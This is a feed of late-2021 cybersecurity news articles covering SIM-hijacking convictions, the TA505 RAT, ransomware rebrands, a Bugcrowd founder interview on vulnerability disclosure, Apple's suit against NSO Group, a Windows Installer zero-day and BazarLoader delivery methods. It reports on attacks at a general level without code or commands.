SIM hijacking attacks occur when bad actors steal victims' mobile phone numbers and route their phone calls and SMS messages to attacker-controlled devices. They are typically able to carry out this attack by convincing a mobile phone provider employee (either by bribery or by posing as the victim) to swap a victim's phone number to an attacker-controlled SIM card. After stealing these phone numbers, attackers can use them to reset passwords on various online accounts - including email, cloud storage and cryptocurrency exchange accounts. Since attackers also have control of the phone numbers, this allows them to bypass two-factor authentication (2FA) security measures as well.

In total, The Community stole millions of dollars worth of cryptocurrency, stealing anything from $2,000 to over $5 million from individual victims.

Endicott, who pleaded guilty, must pay $121,549.37 in restitution in addition to his sentencing. Other members of the group that have been sentenced include Ricky Handschumacher, 28, of Pasco Country, Florida; Colton Jurisic, 22, of Dubuque, Iowa; Reyad Gafar Abbas, 22, of Charleston, South Carolina; Conor Freeman, 22, of Dublin, Ireland and Ryan Stevenson, 29, of West Haven, Connecticut.

SIM hijacking is a major security challenge both for wireless carriers and their mobile customers, with criminals estimated to have stolen millions of dollars in this way. In February, Europol announced it had arrested 10 criminals affiliated with a gang that made over $100 million in cryptocurrencies after targeting thousands of victims with SIM hijacking attacks throughout 2020 - including famous internet influencers, athletes and musicians.

However, beyond these law enforcement crackdowns, government officials have sought to put the issue on the Federal Communications Commission’s (FCC) radar over the years. In 2020, a group of senators and representatives asked the FCC to require wireless carriers to better safeguard consumers from this type of attack. In the letter, government officials stressed that the fraudulent attack could endanger national security, if a cybercriminal uses the attack to hack into the email account of a public safety official, for instance.

Currently, the FCC relies on Customer Proprietary Network Information rules, as well as Section 222 of the Communications Act of 1934, to protect consumer data. These rules require carriers to implement several protections against attackers gaining unauthorized access to customers’ private data. The FCC also has pointed to regulations (Local Number Portability rules) that govern the porting of phone numbers from one carrier to another.

In September, the FCC proposed to amend these rules with the intent of cracking down on SIM hijacking. In its proposal, the commission looked at various ways to bolster security, including additional fields of customer-provided information needed to validate wireless-to-wireless ports, or a customer initiated passcode field for wireless number port requests.

“It’s important we do this now… four out of five SIM swap attempts in the United States are successful,” said Jessica Rosenworcel, acting chairwoman of the FCC, in a statement. “We can help fix this. I look forward to the record that develops and putting an end to this cyber fraud.”

<![CDATA[TA505 Seen Using P2P RAT in New Operations]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/ta505-seen-using-p2p-rat-in-new-operations https://duo.com/decipher/ta505-seen-using-p2p-rat-in-new-operations Wed, 01 Dec 2021 00:00:00 -0500

A threat group known for deploying the Clop ransomware and Dridex trojan is now using a unique remote administration tool that can communicate directly with other compromised hosts via a peer-to-peer network.

Researchers at NCC Group have been tracking the activity from a group known as TA505 for several months and they’ve discovered at least three distinct networks of infected machines. The RAT that the group is deploying bears some resemblance to other tools that TA505 uses, such as a similar programming style to a tool known as Grace that the group has deployed for several years.

TA505 is a venerable group and, like many other cybercrime groups, it has shifted tactics many times over the years in order to keep ahead of defenders and maximize profits. The group started out as a typical cybercrime crew, performing network intrusions to facilitate fraudulent bank transfers to accounts they controlled. TA505 also took advantage of a close association with EvilCorp, a notorious cybercrime group that is best known for its use of the Dridex banking trojan. The TA505 actors used Dridex as well, but eventually moved on.

“However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505,” a report by Nikolaos Pantazopoulos and Michael Sandee of NCC Group says.

“After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself."

“The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had later been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.”

The new RAT that NCC Group discovered is relatively simple and includes three individual components: a loader, a signed driver, and a tool that performs the communication with other nodes on the network. Once the downloader is on a new machine, it checks the operating system version and then contacts the remote command-and-control server and downloads several other files, including the P2P binary itself, some drivers, and lists of processes, drivers, services, registry keys, and files to filter.

The signed driver that the downloader installs performs most of the other pertinent actions, such as decrypting shellcode, copying it, and then running the payload. The P2P functionality in the RAT uses the UDP protocol for communication.

“After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information,” the researchers said.

NCC Group didn’t specify where the targets of the new RAT are, but TA505 has been known to target a wide range of organizations around the world in past operations.

<![CDATA[VirusTotal Adds Collections Feature for Better Collaboration and Context]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/virustotal-adds-collections-feature-for-better-collaboration-and-context https://duo.com/decipher/virustotal-adds-collections-feature-for-better-collaboration-and-context Tue, 30 Nov 2021 00:00:00 -0500

VirusTotal, a key repository of malware samples and suspicious files for security researchers and defenders, is introducing a new service that enables users to collaborate and share data and indicators of compromise in real time.

The Collections feature allows any user to create a new collection for a file or malware sample that includes a variety of different IOCs, such as file hashes, domains or URLs or other information. The collection can also include a description and VirusTotal will add other information to the collection, such as tags and metadata.

Researchers and security teams often use informal methods such as Twitter, Pastebin, or Dropbox for sharing IOCs, threat intelligence, hashes of malware samples, and lists of suspicious domains. There are also a number of private forums in which that information is shared, but those tend to be small and so data is not disseminated widely. Those methods work for specific use cases, but getting threat information out to the widest possible audience of defenders and researchers can make a significant difference in heading off attacks.

The VirusTotal Collections feature is designed to enable researchers and defenders to update their contributions as needed and allow others to consume them.

“Collection owners can update these by adding or removing IoCs. They are public via our UI and API, and they can be shared using their permalink. This makes it a very convenient way of linking to listings of IoCs in blog posts, research reports and the like,” Juan Infantes of VirusTotal said in a post.

VirusTotal has been the default platform for checking potentially malicious files and URLs for many years, and has evolved into a resource for community sharing and discussion, as well.

“Time evolves and now most investigations go beyond one observable, quickly adding up several indicators of compromise (IOCs) for one single incident . With many security researchers sharing their findings in blog posts and tweets, it’s getting hard to keep track of all these data inputs. Moreover, these investigations change over time bringing more difficulty into reporting the new findings,” Infantes said.

<![CDATA[Ransomware Group Continually Rebrands to Slip Under Radar]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/ransomware-group-continually-rebrands-to-slip-under-radar https://duo.com/decipher/ransomware-group-continually-rebrands-to-slip-under-radar Mon, 29 Nov 2021 00:00:00 -0500

A ransomware operator has continually rebranded itself over the past year in order to evade detection, while launching cyberattacks on critical infrastructure across several industries.

Researchers with Mandiant detailed a threat group called UNC2190, which is an operator behind an affiliate ransomware program. Since June, researchers said they have observed the group targeting the education, health and natural resources sectors in the U.S. and Canada. However, its activities trace back to at least July 2020, and since then the group has rebranded several times.

“UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering,” Tyler McLellan and Brandan Schondorfer, with Mandiant, said on Monday. “This highlights how well-known tools, such as Beacon, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”

Researchers said that UNC2190's rebrands, coupled with the fact that it is lesser known and potentially smaller, means the group is able to avoid public scrutiny. In July 2020, researchers said that the group deployed ransomware called Rollcoast while branded as “Eruption.” In June 2021, the group rebranded itself as “Arcane” and released a web portal aimed at publicly shaming victims, likely in an attempt to further extort them. Researchers observed three victims being publicly extorted in this way in June.

Then in October, researchers observed a new public shaming web portal and blog from a group calling itself “Sabbath.” This appeared to be yet another rebranding effort, as the web portal and blog were nearly identical to that of “Arcane,” including the same text content, consistent grammatical errors, and only minor changes to the name, color scheme and logo.

Researchers observed victims being publicly extorted via this newer web portal in mid-November, when six victims were added over the course of two days. UNC2190’s victims include a Texas school district, which was hit with a cyberattack in September. The threat group made a multi-million dollar ransom demand for this victim and emailed its staff, parents and even students to put further pressure on the district.

“UNC2190 uses a multifaceted extortion model where ransomware deployment may be quite limited in scope, bulk data is stolen as leverage, and the threat actor actively attempts to destroy backups,” said McLellan and Schondorfer.

Researchers first came across UNC2190's activities when they identified posts on various Russian language hacker forums that sought out partners with access to commercial networks. UNC2190 was offering to pay a percentage of successful ransom payments collected to the hackers that provide access, exfiltrate stolen data, delete backups, and carry out portions of their ransomware operations, said McLellan.

“UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering."

The Rollcoast ransomware, first observed in use by UNC2190 in July 2020, is a dynamic link library (DLL) that encrypts files on logical drives attached to a system. The ransomware has various features allowing it to evade detection: For instance, it had only one ordinal export, which researchers believe could mean the sample was designed to sidestep detection and be invoked within memory, potentially through the Beacon malware provided to affiliates. The Rollcoast ransomware would also check the system language and exit if it detected a non-supported language code (from Russia, Turkey or Albania, for instance). This is a common practice for ransomware families, and helps them avoid encrypting systems in Russia and other Commonwealth of Independent States countries, potentially to avoid attracting attention of law enforcement in countries where ransomware operators or affiliates may reside, said researchers.

“Mandiant only observed Rollcoast in one incident which was attributed to UNC2190," said Schondorfer. "In this incident, Mandiant Consulting captured Rollcoast in memory. Since Rollcoast appears to be designed to be loaded into memory by Beacon, this has allowed UNC2190 to avoid leaving copies of the ransomware on disk at any victims and kept ROLLCOAST from showing up on VirusTotal and other malware repositories.”

Since July 2020, UNC2190 was offering these pre-configured Beacon backdoors, which are payloads that are part of the Cobalt Strike commercial simulation software. Cobalt Strike is marketed to red teams but has also been stolen and utilized by ransomware operators. However, researchers said the use of a random affiliate program operator provided Beacon is “unusual” and complicates attribution. These payloads contain “unique malleable profile elements” to affiliates in its program. Researchers observed that samples included GET requests that ended with kitten.gif, for instance.

Ransomware groups have typically rebranded as a way to fly under the radar. Researchers have suggested that the DarkSide ransomware gang for instance rebranded as a BlackMatter ransomware operation. These rebrands comes asfederal agencies crack down both on ransomware operators and the way that ransom payments are made, after the Colonial Pipeline attack in May.

“The targeting of critical infrastructure by ransomware groups has become increasingly concerning as evidenced by governments moving to target ransomware actors as national security level threats with particular attention to groups that target and disrupt critical infrastructure,” said McLellan and Schondorfer.

<![CDATA[Q&A: Casey Ellis]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/q-and-a-casey-ellis https://duo.com/decipher/q-and-a-casey-ellis Wed, 24 Nov 2021 08:00:00 -0500

Casey Ellis, founder, chairman and CTO of Bugcrowd, recently joined Lindsey O’Donnell-Welch on the Decipher podcast to discuss how vulnerability disclosure programs are changing. This is a condensed and edited version of the conversation.

Lindsey O’Donnell-Welch: What first inspired you to focus on vulnerability disclosure as part of your career? Was there an epiphany moment or experience that you made you want to focus in on this, or did it just happen?

Casey Ellis: No, there were definitely a couple of epiphany moments. I've always loved hacking, and innovation as an adjacent train of thought to hacking, so that was the precursor to it. With Bugcrowd, that meant really just looking at traditional solutions, traditional approaches, when it comes to outsmarting the adversary, and realizing that the math is wrong if there's lots of people building software, and doing awesome stuff, making mistakes that introduce vulnerabilities in the process. And then you've got this undefined crowd of adversaries with their own incentive to find those issues and exploit them. One person being paid by the hour, no matter how good they are, is eventually going to lose. I think the irrational founder gene in me got locked on that idea and I wanted to try to find ways to solve it. I think, on the other side of it, having grown up in the hacker community, wanting to keep my buddies out of jail, in a sense, that side of it in particular ended up turning into Disclose.io. But on the background part of things, it was really about how do we normalize and promote the role of the hacker, and people that can think differently and do bad things to computers, but for good reasons. How do we normalize that in the market? Because at that point in time, if you're a hacker, you're inherently bad and inherently evil. I think in the 10 years since there's been a lot of progress in folks getting their head around the idea of there being like a digital locksmith, and not that we're just all burglars or something like that.

Lindsey O’Donnell-Welch: One major part of vulnerability disclosure, and the conflict that we've seen around that, has been how hackers are perceived by companies at a broader level. How has the term “hacker” changed since you first started looking at vulnerability disclosure policies over the past decade?

Casey Ellis: I think "hacker" is still definitely a term that frightens some people. I think the broader view - in technology now, not just in security - is that it is actually a dual-use concept. It's not a concept that has an inherent moral loading, which is kind of where we started: If you're doing this sort of thing in technology, that means you must be nefarious or malicious, and therefore, we shouldn't trust you. Therefore, if you're a hacker, you're a bad person, please go away. I think we're past that now, broadly speaking, to the point where people see it as a morally agnostic skill set or craft or trade. And it really becomes a question at that point of where you draw your ethical lines as you do the hacking thing, so to speak. We've put a lot into this, as have a bunch of others over the years, to try to reclaim the word “hacker,” and I don't feel that will ever be a solved problem fully. But I think reintroducing this idea of it being possible for that sort of thing to be done in good faith, that wasn't true when we started. I believe it is true now, which is awesome.

Lindsey O’Donnell-Welch: You still hear these stories, like back in 2017, you had the whole incident with the DJI, the drone maker, and the security researcher who tried to report a bug and was met with threats. And even this past year, you have the drama with the Missouri governor who was vowing he would prosecute a journalist who reported a security flaw. So we're still seeing these types of incidents crop up, but then at the same time, I would say that there have been a lot of positive initiatives in the U.S. government: Look at Hack the Pentagon or even this past year, CISA and the DHS have done a pretty good job of making it known that they want to recruit hackers, and that this is is a good thing.

Casey Ellis: Most definitely, I think CISA’s work around the binding operational directive that they put out with OMB to mandate that across the U.S. federal government, they put a lot of work into really explaining what was going on to a bunch of folks that would probably be unfamiliar with it at first pass. Because that is the starting point, when you talk to someone about hackers being helpful, and now they're going to tell you where you've made a mistake, like that can be quite an unusual and confronting idea the first time you hear it, so you have to basically take people through the why and the process and why it's actually really important as something that you do.

The other thing that CISA put a lot of work into was including Safe Harbor clauses in the recommended boilerplate language. Some of the stuff actually drew from Disclose.io and it ended up with parts of it going back into Disclose.io as an open source standardization project. And that's really reflective of the fact that the laws haven't caught up with with this idea of dual-use and the ability to hack in good faith. Most things are still written in a way that assumes that you're breaking the law, and you've got to prove that you aren't, which is not like most other crimes. So, the idea of putting templates out there that allow organizations to create a carve out for people that are working in good faith; that, again, is something that's fairly novel, and fairly hard to do. When lawyers get led into uncharted territory, they tend to get quite verbose in the interest of being legally complete, and that ends up being confusing for folks. So CISA did a really good job of shortcutting that, and Bugcrowd’s proud to be the partner of choice on actually delivering those VDPs and, in some cases, bug bounty programs, out to the federal government here in the U.S.

Lindsey O’Donnell-Welch: That partnership, can you talk a little bit more about the impact of that, especially across different government agencies, and how the rollout has been?

Casey Ellis: Yeah, definitely, the big thing is that it's not as simple as just putting a policy out there on a website, and then opening an email inbox, and then optionally offering to pay people if you're taking a VDP and actually turning it into a bug bounty program. There's the vulnerability triage, there's the remediation workflows, there's making sure that information gets to the right place within the organization, so that stuff can get fixed. And in the meantime, there's someone who's found an issue who's waiting for a response and trying to understand whether or not they've been helpful and if that thing's gonna get fixed. All of that process needs management and that's a lot of what Bugcrowd built out in the form of our team and the stuff that we built into the platform to really simplify that, to specialize in doing that sort of thing well. Government agencies aren't usually on the cutting edge of technology, they oftentimes need a fair bit of help with implementing new ideas like this one, so this is where we come in to help them actually run the program but also guide them through setting it off if that's needed as well.

Lindsey O’Donnell-Welch: I’ve heard plenty of stories of companies that want to start rolling out a program but they don't think about the triage, as you say, or the reporting aspect of it or even being able to handle the kind of the different vulnerabilities that come up.

Casey Ellis: Yeah definitely. With starting it up, this is something that we saw a lot of early on in Bugcrowd when bug bounty as a concept got a bit of a halo effect around it. And that still exists. But early on that was the dominant feature, people just wanting to do it because they wanted to get in TechCrunch and make a big noise about how good they were at security without necessarily thinking through the downstream adjustments that it's ultimately meant to cause. To me, public programs, in particular vulnerability disclosure and bug bounty programs, the thing that's actually the most powerful about them is recognition outside of the security team within the organization that “yeah, mistakes happen, to err is human, we are going to have things that are vulnerable that we didn't intend to put there.” That's not a truth to hide from, that's a truth to basically just accept, and then try to start working with. Let's operate on the assumption that to err is human, let's figure out where the risks that are introduced as a byproduct of that exist, fix those, and then try to learn from that in ways that reduces how frequently that happens in the future. You can't just run headlong, that's not a switch that you can necessarily flick on as an organization, it's usually a process of crawling first and walking and then running.

“Let's operate on the assumption that to err is human, let's figure out where the risks that are introduced as a byproduct of that exist, fix those, and then try to learn from that in ways that reduces how frequently that happens in the future.”

Lindsey O’Donnell-Welch: Right, and even adopting that as a mindset, that security errors are going to happen, and that mistakes will happen, that seems to me like it could be a whole entire cultural mind shift for the work environment. So it's more tough than even just rolling out a simple program. It's the entire environment that needs to change.

Casey Ellis: Yeah, and even the management culture, leadership, elite, all these different things, I'm increasingly convinced - doing all this stuff with Bugcrowd, with Disclose.io, having worked in security pretty much since I finished high school, I'm passionate about this space of vuln disclosure and crowdsourcing, but I'm just fascinated with security in general as a concept - and thinking about it through that lens, I'm increasingly convinced that a lot of what we see on the internet is the product, ultimately, of people not thinking that that would be possible in the first place. Like this idea of “ostrich risk management,” I call it, where if you bury your head in the sand, all of a sudden, the problem won't matter anymore. I think there's been a period of time in technology and on the internet, where that has actually been true, where people have gotten away with not doing as much as they maybe should have. But especially over the past two years with changes in the use of technology, and I think changes in adversary behavior as well, that's fairly obviously not a good strategy going forward. So helping people make that shift is something that we do a lot.

Lindsey O’Donnell-Welch: When companies are looking at these good faith type policies and they're putting their heads together, where is that decision making process being handled? Is there any kind of collaboration with security teams?

Casey Ellis: Usually, left to its own devices, it'll be the security or the product team, in some cases, they just pick something up, do copy, paste and kind of slap it on our website, and off it goes from there. That's the thing that happens sometimes. More often, though, they'll interact with the in-house counsel or external counsel, sometimes the marketing team gets involved, to make sure that the verbiage is on brand and different things like that. It can end up becoming quite an involved process and a bit of a decision by consensus. And that often is why these policies end up being a million pages long and having all sorts of confusing stuff in them, because everyone wants to add something. That's a part of what Disclose.io puts out there as a boilerplate to say, here's the simplest possible version of this, that's going to be as complete as it can be. And frankly, this is where Bugcrowd comes into it as well, in terms of helping organizations navigate that, when they've got different stakeholders that are trying to work out is this a good idea or not? How do we frame the language to make it safe? All those different things that can be a pretty complicated conversation to have for the first time I think, for folks that have been through it before it gets a lot easier. But if you've never interacted with this sort of thing before it can be quite like “Whoa, what the hell are we doing?” So oftentimes we’ll get involved as Bugcrowd to actually help basically align those stakeholders, understand what the different concerns are, and try to bring that back to a midpoint.

Lindsey O’Donnell-Welch: You've had experience both in Australia, and then also San Francisco - you may have a good perspective on how the state of vulnerability disclosure is different around different areas of the globe right now. Is there any place worldwide where they might have more mature vulnerability disclosure guidelines, or rules in place?

Casey Ellis: I'll speak to the ones that are more mature. The Netherlands have been really good with this stuff for a long time. There's the t-shirt, “I hacked the Dutch government, and all I got was this lousy t-shirt,” like that has been around for 12 or 13 years, and it's a collectible. So those guys in particular are a country that basically, at some point in time, decided that this was really important, put the effort into standardizing it and normalizing it, and have reaped the benefits from it since. Estonia is pretty amazing as well. It's interesting, because you've got these smaller countries population wise that are able to be a bit more agile, that just decide to do a thing and then go off and do it. Honestly, I think the U.S. has been pretty incredible in terms of its leadership in this area. You know once the Hack the Pentagon stuff got rolling, that kind of rolled downhill? You know, in terms of congressional bills, Hack the XYZ, coming out of out of Congress, and then you know, BOD 20-01 out of DHS and OMB. Australia is catching up, we’re talking a lot with the Department of Home Affairs around their cybersecurity strategy, and they included vulnerability disclosure in one of the four recommendations or four primary recommendations in that document... But in terms of it being a thing that we just do, I'd say that they're a little further back from the U.S. or our Dutch friends. But there's work going into basically correcting that. And I'd say the same goes for the Singaporean government, it’s working really actively on this stuff, or Dubai. There's different places around the world where you see it switched on. And it gets moving from there. So there's lots of activity in Europe around starting to fold this in behind some of the leading edge stuff they did around privacy, because you can't really have privacy without security. So this is coming in behind that as a way to make sure that some of the stuff they've done to protect citizens’ data is actually possible in the first place. Because the controls have integrity to them. So in general, it's a mishmash... at this point in time, there's a decent cohort of countries that are basically, you know, actively working on catching up.

Lindsey O’Donnell-Welch: Looking ahead to 2022, do you see any big trends emerging when it comes to vulnerability disclosure? I know that you have your Inside the Mind of a Hacker Report too, I would love to hear any kind of takeaways from that as it relates to where things are going.

“I think the pandemic has driven a lot of introspection, in the community and on the researchers’ side, with people wanting to take better control of their destiny, so to speak, from a career standpoint.”

Casey Ellis: Yeah, most definitely. I do think we're heading into another year that has a lot of elections in it. And I think at this point in time, the relationship between information warfare and cybersecurity, that's always been a thing, but I think it really showed its head in 2020 in a way that a lot of people understood, in a way that they hadn't really understood before. There's a lot of stuff coming up next year, the midterms here in the U.S., there's probably going to be a federal election in Australia, and lots of other countries. So those are all opportunities for that subject to come back up. And it does come back to like, to what degree can we trust the systems that we rely on to actually conduct the democratic process? To me that's a really important question to be to be able to answer, I do see VDP as a fundamental tool to combat both the security side of that, and also the information warfare side of that, because you can go to a voter, even if they're non-technical, and say, it's neighborhood watch for the internet, and they'll get it right. Doesn't mean that it's perfect, but it means that I've just explained to you something that we are doing to try to keep your vote and your information safe, which is good. I see that playing out pretty interestingly next year.

Probably another one is just the temerity of attackers just in general. People don't seem to care as much about getting caught anymore. And that, to me, was a pretty big shift in attacker behavior that started in 2020, but has continued and I think spilled over into the ransomware groups and cybercriminal operators in 2021. That combined with the fact that ransomware operators, their business models working quite well. So that means that there’s a lot of money to spend on tooling and innovation. So reinvesting some of those proceeds into being more effective, where that goes next. I'm not sure but as an entrepreneur, putting myself in their shoes, that's probably what I'd be working on right now. So I'd expect to see the outcome of that start to play out next year. That one's a little terrifying. But I think just staying on top of it, there's a lot of work going into that just to combat ransomware, not so much as a specific type of malware. It used to be that attackers could only monetize things that were of value when they stole them, but ransomware basically introduced this idea of denying service and being able to monetize that which broadens the scope of your potential attack surface as a criminal operator. So if it works, it's going to continue to happen because that's how capitalism works.

And with the “Inside the Mind of a Hacker Report” I think the pandemic has driven a lot of introspection, in the community and on the researchers’ side, with people wanting to take better control of their destiny, so to speak, from a career standpoint: "I want to be in a position where I can actually have more of a direct input into into what I'm getting back." And just thinking about the Great Resignation, sort of millennial midlife crisis thing that's happening right across the world, it has definitely played out in the hacker community in some ways that I think they're actually quite productive. Like 80 percent of the folk we surveyed had found vulnerabilities they'd not encountered before the pandemic that was partly a product of technology change, but also because they're all learning new things, which I think is pretty awesome. On the tech side of it, 74 percent of the folks responded that vulnerabilities in general had increased since the onset of COVID-19. That whole idea of digital transformation and how quickly we all had to pivot to basically respond to the pandemic, like speed is the natural enemy of security when it comes to things like that. So, I've seen a lot of shifts in vulnerability patterns that do oftentimes look like a product of people just doing stuff quickly and not necessarily thinking through the downside. So I think we're going to continue to unpack how that's played out, over 2022 as well.

Lindsey O’Donnell-Welch: I’m curious about how the pandemic and this changing viewpoint of work and remote work is really having an impact on the InfoSec community overall.

Casey Ellis: Definitely, but I mean, my own experience of that is getting stuck on the opposite side of the planet for 18 months, like that was that was a thing. I think everyone's had some sort of version of that, in terms of ways that they've had to change how they operate and work. But you know, more generally, this idea of just access and distributed access. Like another piece in the “Inside the Mind of a Hacker Report” report was 45 percent of the respondents believe that this restrictive scope actually inhibits the discovery of critical vulnerabilities that are meaningfully impactful to an organization. I think that's more true now. That's always something that I've believed is true, but it's more true now than it was before because everyone's accessing things from the outside. So this idea of, as an organization, it's not just your front door website, it's your entire entity, and all of the different ways into that. Ultimately, if I'm an attacker trying to get in and create an outcome, I don't care how I do it, I just want to get in. So scope needs to reflect that even more urgently next year than it has in the past.

<![CDATA[Apple Sues NSO Group]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/apple-sues-nso-group https://duo.com/decipher/apple-sues-nso-group Wed, 24 Nov 2021 00:00:00 -0500

Apple has filed a lawsuit against NSO Group, the maker of the notorious Pegasus spyware, alleging that the company has harmed Apple’s customers as well as Apple itself by abusing “Apple services and servers to perpetrate attacks on Apple’s users”.

The lawsuit is not unprecedented--Facebook’s WhatsApp division sued NSO Group in 2019 for unauthorized access to the company’s servers, and that’s part of the legal argument that Apple is using in its complaint. Apple alleges that NSO Group created more than 100 Apple IDs and used Apple’s iCloud servers to deliver an exploit payload to target devices, which then loaded the Pegasus spyware. The delivery method relied on an exploit that researchers named FORCEDENTRY, which exploited a zero day in iOS 14.

“Defendants contacted Apple servers using their Apple IDs to confirm that the target was using an Apple device. Defendants would then send abusive data created by Defendants through Apple servers in the United States and abroad for purposes of this attack. The abusive data was sent to the target phone through Apple’s iMessage service, disabling logging on a targeted Apple device so that Defendants could surreptitiously deliver the Pegasus payload via a larger file. That larger file would be temporarily stored in an encrypted form unreadable to Apple on one of Apple’s iCloud servers in the United States or abroad for delivery to the target,” Apple said in the complaint, which was filed Tuesday in the U.S. District Court for the Northern District of California.

Researchers at Citizen Lab at the University of Toronto discovered the FORCEDENTRY exploit in September and notified Apple. Within a week of the notification, Apple released an update for iOS that closed the vulnerability on which FORCEDENTRY relied.

Apple is asking the court to permanently prevent NSO Group from using any Apple devices, software, or services, and is asking for monetary damages, as well. The company said it will donate any damages it wins to organizations doing research on cyber surveillance, and it also is pledging an additional $10 million to support those research efforts. Apple also said it has begun notifying the small number of people who have been targeted by the FORCEDENTRY exploit. Some activists in Thailand have already received notifications and have posted the emails on Twitter. The notifications will consist of an email, an iMessage text, and a banner at the top of the user's account page.

"State-sponsored attackers are very well-funded and sophisticated, and their attacks evolve over time. Detecting such attacks relies on threat intelligence signals that are often imperfect and incomplete. It’s possible that some Apple threat notifications may be false alarms, or that some attacks are not detected. We are unable to provide information about what causes us to issue threat notifications, as that may help state-sponsored attackers adapt their behavior to evade detection in the future," Apple said.

“Defendants are notorious hackers—amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery."

NSO Group has been the subject of more than a few legal actions lately, and the U.S. government has also sanctioned the Israeli company. In October, the Department of Commerce issued an interim final rule that essentially prevents Americans from selling exploits or vulnerabilities to some foreign entities, and earlier this month Commerce added NSO Group to its Entity List.

In its lawsuit, Apple said NSO Group’s actions have injured the company and its customers.

“Defendants are notorious hackers—amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse. They design, develop, sell, deliver, deploy, operate, and maintain offensive and destructive malware and spyware products and services that have been used to target, attack, and harm Apple users, Apple products, and Apple,” Apple says in the lawsuit.

“For their own commercial gain, they enable their customers to abuse those products and services to target individuals including government officials, journalists, businesspeople, activists, academics, and even U.S. citizens.”

“At Apple, we are always working to defend our users against even the most complex cyberattacks. The steps we’re taking today will send a clear message: In a free society, it is unacceptable to weaponize powerful state-sponsored spyware against those who seek to make the world a better place,” said Ivan Krstić, head of Apple Security Engineering and Architecture.

<![CDATA[Malware Samples Target Windows Installer Flaw]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/malware-targets-windows-installer-zero-day https://duo.com/decipher/malware-targets-windows-installer-zero-day Wed, 24 Nov 2021 00:00:00 -0500

Researchers are warning of malware samples in the wild that they say are attempting to take advantage of a recently disclosed zero-day flaw in Microsoft's Windows Installer software component.

The flaw allows an attacker with access to a limited user account to obtain administrator privileges. The issue stems from an insufficient patch of CVE-2021-41379, which was issued on Nov. 9 as part of Microsoft’s Patch Tuesday security updates. On Nov. 22, the researcher that originally discovered the flaw, Abdelhamid Naceri, released proof-of-concept (PoC) exploit code on GitHub. Naceri - and other security researchers - confirmed the exploit code worked despite the fix.

Microsoft initially ranked CVE-2021-41379 as a medium-severity flaw, with a CVSS base score of 5.5. In order to exploit this initial flaw, an attacker must already have access to the targeted system, and must be able to execute low-privilege code.

However, “the release of functional proof-of-concept exploit code will certainly drive additional abuse of this vulnerability,” said Jaeson Schultz, technical leader with Cisco Talos, in a Tuesday threat advisory. So far, three malware samples relating to the vulnerability have been discovered, with the first appearing on Nov. 21, he said.

This is a privilege escalation bug, so it could be added to an attacker's arsenal for escalation to admin privileges," Schultz said. "Based on the filenames associated with the samples, it appears that these malicious binaries were compiled by someone testing out the zero-day vulnerability. These could be either other security researchers experimenting with the proof-of-concept code, or it could be miscreants preparing for an attack.

Schultz said that as of the publication of the blog, there is no patch available from Microsoft. Microsoft did not respond to inquiries regarding a timeline for a potential fix.

With CVE-2021-41379, an attacker could abuse the Windows Installer service - Microsoft Windows’ component used for the installation, maintenance, and removal of software - by creating a junction. The PoC exploit code for the bypass of the patch, meanwhile, allows an attacker to overwrite the discretionary access control list (DACL) for Microsoft Edge Elevation Service, which identifies users that are allowed or denied access for various securable objects. This would allow a potential attacker to replace any executable file on the system with an MSI file, and run code as an administrator. The flaw impacts versions of Microsoft Windows, including Windows 11 and Server 2022, said researchers.

This flaw would let the attackers run code as an administrator on that system," said Schultz. "That could be used to download/install additional software, exfiltrate data from the compromised system, or even modify/delete data from the compromised system. Essentially they would have complete control.

This zero-day flaw is only the latest to afflict Microsoft products. The company earlier this month released patches for a remote code execution vulnerability in Exchange Server, which was being exploited in the wild. The important-severity flaw (CVE-2021-42321) stemmed from an improper validation of cmdlet arguments, which are commands used in the PowerShell environment. Researchers with Fortinet's FortiGuard Labs on Tuesday said that PoC exploit code has been released for this flaw. Microsoft also released fixes for an important-severity security feature bypass zero-day (CVE-2021-42292) in Microsoft Excel.

<![CDATA[Decipher Podcast: Casey Ellis]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/decipher-podcast-casey-ellis https://duo.com/decipher/decipher-podcast-casey-ellis Tue, 23 Nov 2021 08:00:00 -0500

<![CDATA[BazarLoader Attacks Use Compromised Software Installers]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/bazarloader-malware-expands-delivery-tactics https://duo.com/decipher/bazarloader-malware-expands-delivery-tactics Tue, 23 Nov 2021 00:00:00 -0500

Researchers have observed the BazarLoader information stealer, known for providing initial access for various ransomware affiliates, expanding its delivery methods to now include the use of compromised software installers and the abuse of ISO files.

The loader, which was first observed in April 2020, primarily acts as a delivery mechanism for second-stage malware, including several high-profile ransomware families like Ryuk, Conti and Zeppelin. Over the past year, researchers have observed an increase in BazarLoader (along with Trickbot) deliveries, which they said have likely led to a corresponding increase in Conti ransomware attacks since June.

“The number of arrival mechanism variations used in BazarLoader campaigns continue to increase as threat actors diversify their attack patterns to evade detection,” said Ian Kenefick, threat analyst with Trend Micro, in a Tuesday analysis.

